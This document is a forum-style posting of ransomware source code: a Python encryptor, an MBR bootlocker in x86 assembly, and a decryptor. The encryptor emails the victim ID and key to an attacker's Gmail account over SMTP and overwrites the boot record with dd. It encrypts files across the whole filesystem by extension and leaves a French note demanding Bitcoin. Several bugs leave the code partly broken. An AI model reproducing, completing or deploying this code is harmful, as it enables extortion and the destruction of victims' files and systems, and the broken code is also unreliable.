Ransomware.py[quode]import osimport sysimport randomimport structimp

1. Ransomware.py
2. [quode]
3. import os
4. import sys
5. import random
6. import struct
7. import smtplib
8. import string
9. import datetime
10. import time
11.  
12. import getpass as gp
13.  
14. from Crypto.Cipher import AES
15. from Crypto.PublicKey import RSA
16. from multiprocessing import Pool
17.  
18. # Function to generate our client ID
19. def gen_client_ID(size=12, chars=string.ascii_uppercase + string.digits):
20. return ''.join(random.choice(chars) for _ in range(size))
21.  
22. ID = gen_client_ID(12)
23. key = RSA.generate(2048)
24. exKey = RSA.exportKey('PEM')
25.  
26. # Check to see if we're on linux and have root, if so use dd to override the MBR with our bootlocker.
27. if sys.platform == 'linux2' and gp.getuser() == 'root':
28. try:
29. os.system("dd if=boot.bin of=/dev/hda bs=512 count=1 && exit")
30. except:
31. pass
32. else:
33. try:
34. os.system("sudo dd if=boot.bin of=/dev/hda bs=512 count=1 && exit")
35. except:
36. pass
37.  
38.  
39. def send_ID_Key():
40. ts = datetime.datetime.now()
41. SERVER = "smtp.gmail.com"
42. PORT = 587
43. USER = "address@gmail.com" # Specify Username Here
44. PASS = "prettyflypassword" # Specify Password Here
45. FROM = USER
46. TO = ["address@gmail.com"]
47. SUBJECT = "Ransomware data: "+str(ts)
48. MESSAGE = """\Client ID: %s Decryption Key: %s """ % (ID, exKey)
49. message = """\ From: %s To: %s Subject: %s %s """ % (FROM, ", ".join(TO), SUBJECT, MESSAGE)
50. try:
51. server = smtplib.SMTP()
52. server.connect(SERVER, PORT)
53. server.starttls()
54. server.login(USER, PASS)
55. server.sendmail(FROM, TO, message)
56. server.quit()
57. except Exception as e:
58. # print e
59. pass
60.  
61.  
62. def encrypt_file(key, in_filename, out_filename=None, chunksize=64*1024):
63.  
64. if not out_filename:
65. out_filename = in_filename + '.crypt'
66.  
67. iv = ''.join(chr(random.randint(0, 0xFF)) for i in range(16))
68. encryptor = AES.new(key, AES.MODE_CBC, iv)
69. filesize = os.path.getsize(in_filename)
70.  
71. with open(in_filename, 'rb') as infile:
72. with open(out_filename, 'wb') as outfile:
73. outfile.write(struct.pack('<Q', filesize))
74. outfile.write(iv)
75.  
76. while True:
77. chunk = infile.read(chunksize)
78. if len(chunk) == 0:
79. break
80. elif len(chunk) % 16 != 0:
81. chunk += ' ' * (16 - len(chunk) % 16)
82.  
83. outfile.write(encryptor.encrypt(chunk))
84.  
85.  
86.  
87. def single_arg_encrypt_file(in_filename):
88. encrypt_file(key, in_filename)
89.  
90. def select_files():
91.  
92. ext = [".3g2", ".3gp", ".asf", ".asx", ".avi", ".flv",
93. ".m2ts", ".mkv", ".mov", ".mp4", ".mpg", ".mpeg",
94. ".rm", ".swf", ".vob", ".wmv" ".docx", ".pdf",".rar",
95. ".jpg", ".jpeg", ".png", ".tiff", ".zip", ".7z", ".exe",
96. ".tar.gz", ".tar", ".mp3", ".sh", ".c", ".cpp", ".h",
97. ".mov", ".gif", ".txt", ".py", ".pyc", ".jar",".gif",
98. ".groups", ".hdd", ".hpp", ".log", ".m2ts", ".m4p", ".mkv",
99. ".mpeg", ".ndf", ".nvram", ".ogg", ".ost", ".pab", ".pdb", ".pif",
100. ".png", ".qed", ".qcow", ".qcow2", ".rvt", ".st7", ".stm", ".vbox",
101. ".vdi", ".vhd", ".vhdx", ".vmdk", ".vmsd", ".vmx", ".vmxf", ".3fr",
102. ".3pr", ".ab4", ".accde", ".accdr", ".accdt", ".ach", ".acr", ".adb",
103. ".ads", ".agdl", ".ait", ".apj", ".asm", ".awg", ".back", ".backup",
104. ".backupdb", ".bay", ".bdb", ".bgt", ".bik", ".bpw", ".cdr3", ".cdr4",
105. ".cdr5", ".cdr6", ".cdrw", ".ce1", ".ce2", ".cib", ".craw", ".crw",
106. ".csh", ".csl", ".db_journal", ".dc2", ".dcs", ".ddoc", ".ddrw",
107. ".der", ".des", ".dgc", ".djvu", ".dng", ".drf", ".dxg", ".eml",
108. ".erbsql", ".erf", ".exf", ".ffd", ".fh", ".fhd", ".gray", ".grey",
109. ".gry", ".hbk", ".ibd", ".ibz", ".iiq", ".incpas", ".jpe",
110. ".kc2", ".kdbx", ".kdc", ".kpdx", ".lua", ".mdc", ".mef", ".mfw",
111. ".mmw", ".mny", ".mrw", ".myd", ".ndd", ".nef", ".nk2", ".nop",
112. ".nrw", ".ns2", ".ns3", ".ns4", ".nwb", ".nx2", ".nxl", ".nyf",
113. ".odb", ".odf", ".odg", ".odm", ".orf", ".otg", ".oth", ".otp",
114. ".ots", ".ott", ".p12", ".p7b", ".p7c", ".pdd", ".pem",
115. ".plus_muhd", ".plc", ".pot", ".pptx", ".psafe3", ".py",
116. ".qba", ".qbr", ".qbw", ".qbx", ".qby", ".raf", ".rat",
117. ".raw", ".rdb", ".rwl", ".rwz", ".s3db", ".sd0", ".sda",
118. ".sdf", ".sqlite", ".sqlite3", ".sqlitedb", ".sr2", ".srf",
119. ".srw", ".st5", ".st8", ".std", ".sti", ".stw", ".stx", ".sxd",
120. ".sxg", ".sxi", ".sxm", ".tex", ".wallet", ".wb2", ".wpd",
121. ".x11", ".x3f", ".xis", ".ycbcra", ".yuv", ".contact", ".dbx",
122. ".doc", ."docx", ".jnt", ".msg", ".oab",".ods", ".pdf", ".pps",
123. ".ppsm", ".ppt", ".pptm", ".prf", ".pst", ".rar", ".rtf", ".txt",
124. ".wab", ".xls", ".xlsx", ".xml", ".zip", ".1cd", ".7zip", ".accdb",
125. ".aoi", ".asf", ".asp", ".aspx", ".asx", ".bak", ".cer", ".cfg",
126. ".class", ".config", ".css", ".csv", ".db", ".dds", ".dwg", ".dxf",
127. ".flf", ".flv", ".html", ".idx", ".js", ".key", ".kwm", ".laccdb",
128. ".ldf", ".lit", ".m3u", ".mbx", ".md", ".mdf", ".mid", ".mlb",
129. ".obj", ".odt", ".pages", ".php", ".psd", ".pwm", ".rm", ".safe",
130. ".sav", ".save", ".sql", ".srt", ".swf", ".thm", ".vob", ".wav",
131. ".wma", ".wmv", ".xlsb", ".3dm", ".aac", ".ai", ".arw", ".cdr",
132. ".cls", ".cpi", ".cpp", ".cs", ".db3", ".docm", ".dot", ".dotm",
133. ".dotx", ".drw", ".dxb", ".eps", ".fla", ".flac", ".fxg",
134. ".java", ".m", ".m4v", ".max", ".mdb", ".pcd", ".pct", ".pl",
135. ".potm", ".potx", ".ppam", ".ppsm", ".ppsx", ".pptm", ".ps",
136. ".r3d", ".rw2", ".sldm", ".sldx", ".svg", ".tga", ".wps",
137. ".xla", ".xlam", ".xlm", ".xlr", ".xlsm", ".xlt", ".xltm",
138. ".xltx", ".xlw", ".act", ".adp", ".al", ".bkp", ".blend",
139. ".cdf", ".cdx", ".cgm", ".cr2", ".crt", ".dac", ".dbf",
140. ".dcr", ".ddd", ".design", ".dtd", ".fdb", ".fff", ".fpx",
141. ".h", ".iif", ".indd", ".mos", ".nd", ".nsd", ".nsf",
142. ".nsg", ".nsh", ".odc", ".odp", ".oil", ".pas", ".pat",
143. ".pef", ".pfx", ".ptx", ".qbb", ".qbm", ".sas7bdat", ".say",
144. ".st4", ".st6", ".stc", ".sxc", ".sxw", ".tlg", ".wad",
145. ".xlk", ".aiff", ".bin", ".bmp", ".cmt", ".dat", ".dit",
146. ".edb", ".flvv"]
147.  
148. files_to_enc = []
149. for root, dirs, files in os.walk("/"):
150. for file in files:
151. if file.endswith(tuple(ext)):
152. files_to_enc.push(os.path.join(root, file))
153.  
154. # Parallelize execution of encryption function over four subprocesses
155. pool = Pool(processes=4)
156. pool.map(single_arg_encrypt_file, files_to_enc)
157.  
158.  
159. def note():
160.  
161. readme = """
162.  
163. ._______ .______ ._______ .__ __. ______ .__ __
164. | ____|| _ \ | ____|| \ | | / || | | |
165. | |__ | |_) | | |__ | \| | | ,----'| |__| |
166. | __| | / | __| | . ` | | | | __ |
167. | | | |\ \----.| |____ | |\ | | `----.| | | |
168. |__| | _| `._____||_______||__| \__| \______||__| |__|
169.  
170. ._______ ._______ ._______ .______ .___ __ ____ ._______ .______
171. | \ | ____|| ____|| _ \ \ \ / \ / / | ____|| _ \
172. | .--. || |__ | |__ | |_) | \ \/ \/ / | |__ | |_) |
173. | | | || __| | __| | ___/ _ \ / | __| | _ <
174. | '--' || |____ | |____ | | |_| \ /\ / | |____ | |_) |
175. |_______/ |_______||_______|| _| \__/ \__/ |_______||______/
176.  
177. Bonjour,
178.  
179. Malheureusement, tous vos fichiers ont été chiffrés avec un cryptage de grade militaire
180. il vous sera donc impossible de les récupérer sans acquerir la clé de chiffrement.
181.  
182. Envoyer 0,5 Bitcoin a "ADRESSE BITCON ICI"
183.  
184. une fois votre versement éffectuer envoyer nous un email a "ransomware@yopmail.fr"
185. avec le numero de la transaction Bitcoin ainsi que votre address email et nous vous enverons
186. la clé de chiffrement au plus vite.
187.  
188. Nous vous remercions de votre patience.
189.  
190. Bonne journée,
191. Le French Deep Web.
192.  
193. """
194.  
195. # Windows variant
196. # outdir = os.getenv('USERNAME') + "\\Desktop"
197.  
198. outdir = os.getenv('HOME') + "/Desktop/"
199. outfile = outdir + "README"
200.  
201. handler = open(outputfile, 'w')
202. handler.write(outfile, ID)
203. handler.close()
204.  
205. if __name__=="__main__":
206. gen_client_ID()
207. send_ID_Key()
208.  
209. try:
210. select_files()
211. note()
212. except Exception as e:
213. pass
214.  
215. [/quode]
216.  
217. bootlocker.asm
218. [quode][BITS 16]
219. [ORG 0x7C00]
220. MOV SI, Msg
221. CALL OutStr
222. JMP $
223. OutChar:
224. MOV AH, 0x0E
225. MOV BH, 0x00
226. MOV BL, 0x07
227. INT 0x10
228. RET
229. OutStr:
230. next_char:
231. MOV AL, [SI]
232. INC SI
233. OR AL, AL
234. JZ exit_function
235. CALL OutChar
236. JMP next_char
237. exit_function:
238. RET
239. Msg db 0xA, 0xD, 0xA, 0xD
240. db '################################################################################################', 0xA, 0xD
241. db '# #', 0xA, 0xD
242. db '# Tous vos fichiers ont été chiffrés avec un cryptage de grade militaire #', 0xA, 0xD
243. db '# Il vous sera donc impossible de les récupérer sans acquerir la clé de chiffrement. #', 0xA, 0xD
244. db '# #', 0xA, 0xD
245. db '# Envoyer 0,5 Bitcoin a "ADRESSE BITCON ICI" #', 0xA, 0xD
246. db '# #', 0xA, 0xD
247. db '# une fois votre versement éffectuer envoyer nous un email a "ransomware@yopmail.fr" #', 0xA, 0xD
248. db '# avec le numero de la transaction Bitcoin ainsi que votre address email #', 0xA, 0xD
249. db '# et nous vous enverons #', 0xA, 0xD
250. db '# la clé de cryptage ainsi que la méthode pour déchiffrer vos fichiers au plus vite. #', 0xA, 0xD
251. db '# #', 0xA, 0xD
252. db '# Nous vous remercions de votre patience. #', 0xA, 0xD
253. db '# #', 0xA, 0xD
254. db '################################################################################################', 0xA, 0xD
255. db ' ', 0xA, 0xD
256. db '################################################################################################', 0xA, 0xD
257. db '# #', 0xA, 0xD
258. db '# Malheureusement, il ne vous reste que 7 jours avant que la clé de cryptage ne soit détruite.#', 0xA, 0xD
259. db '# Bonne Journée, #', 0xA, 0xD
260. db '# Le French Deep Web #', 0xA, 0xD
261. db '# #', 0xA, 0xD
262. db '################################################################################################', 0
263. TIMES 510 - ($ - $$) db 0
264. DW 0xAA55
265. [/quode]
266.  
267.  
268. Décryption.py
269. [quode]
270. import os
271. import sys
272. import struct
273.  
274. from base64 import b64decode
275. from Crypto.Cipher import AES
276. from Crypto.PublicKey import RSA
277. from multiprocessing import Pool
278.  
279. # Read in and decode keyfile
280. with open('privkey', 'r') as keyfile:
281. keyData = keyfile.read().replace('\n', '')
282.  
283. keyDER = b64decode(keyData)
284. key = RSA.importKey(keyDER)
285.  
286. def decrypt_file(key, in_filename, out_filename=None, chunksize=24*1024):
287.  
288. # Split .crypt extension to restore file format
289. if not out_filename:
290. out_filename = os.path.splitext(in_filename)[0]
291.  
292. with open(in_filename, 'rb') as infile:
293. origsize = struct.unpack('<Q', infile.read(struct.calcsize('Q')))[0]
294. iv = infile.read(16)
295. decryptor = AES.new(key, AES.MODE_CBC, iv)
296.  
297. with open(out_filename, 'wb') as outfile:
298. while True:
299. chunk = infile.read(chunksize)
300. if len(chunk) == 0:
301. break
302. outfile.write(decryptor.decrypt(chunk))
303.  
304. # Truncate file to original size
305. outfile.truncate(origsize)
306.  
307. def single_arg_decrypt_file(in_filename):
308. decrypt_file(key, in_filename)
309.  
310. def select_files():
311. # Files to be decrypted are identified by .crypt extension
312. ext = ".crypt"
313.  
314. files_to_dec = []
315. for root, dirs, files in os.walk("/"):
316. for file in files:
317. if file.endswith(str(ext)):
318. files_to_dec.push(os.path.join(root, file))
319.  
320. # Parralelize execution of decrypting function over four sub processes
321. pool = Pool(processes=4)
322. pool.map(single_arg_decrypt_file, files_to_dec)
323.  
324. if __name__=="__main__":
325. select_files()
326. [/quode]